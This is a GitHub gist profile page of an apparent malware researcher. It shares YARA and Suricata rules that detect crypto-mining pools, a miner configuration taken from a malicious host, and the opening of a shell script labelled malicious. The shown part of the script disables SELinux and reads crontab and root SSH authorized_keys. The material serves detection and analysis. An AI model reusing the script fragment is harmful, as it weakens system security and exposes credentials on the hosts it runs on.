Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Researching

GelosSnake GelosSnake

💭
Researching
View GitHub Profile
@GelosSnake
GelosSnake / xmrig.yar
Last active Aug 3, 2020
very simple yara to find xmrig Crypto-Miners
View xmrig.yar
rule MinerGate
{
strings:
$a1 = "minergate.com"
condition:
$a1
}
rule MoneroOrg
{
@GelosSnake
GelosSnake / crypto-Miners_public_pools_sig.txt
Last active Jul 31, 2019
suricata crypto-miner pool rules
View crypto-Miners_public_pools_sig.txt
#Suricata 3.2+
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; dns_query; content:"pool.minergate.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000000; rev:1;)
#Suricata 1.3+
alert udp $HOME_NET any -> any 53 (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; content:"|01|"; offset:2; depth:1; content:"|00 01 00 00 00 00 00|"; distance:1; within:7; content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:20000000; rev:1;)
#Suricata 3.2+
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minexmr.com)"; dns_query; content:"pool.minexmr.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000001; rev:1;)
@GelosSnake
GelosSnake / gist:88694aef6c2819f1f11a42b73d09e421
Created Dec 24, 2018
configuration used by sh miner killer taken from - 45[.]76[.]122[.]92
View gist:88694aef6c2819f1f11a42b73d09e421
related hash: 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
source: hxxp://45[.]76.122.92:8506/IOFoqIgyC0zmf2UR/config.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
@GelosSnake
GelosSnake / sh
Last active Mar 20, 2019
miner killer sh (malicious) - 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
View sh
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/devtools
rtdir="/etc/devtools"
bbdir="/usr/bin/curl"
@GelosSnake
GelosSnake / keybase.md
Created May 31, 2019
GelosSnake keybase
View keybase.md

Keybase proof

I hereby claim:

  • I am gelossnake on github.
  • I am gelossnake (https://keybase.io/gelossnake) on keybase.
  • I have a public key ASAwA_u6Qo3Rss8MsguyHw0fr0ouch111TV1zcmoTwOk0wo

To claim this, I am signing this object:

You can’t perform that action at this time.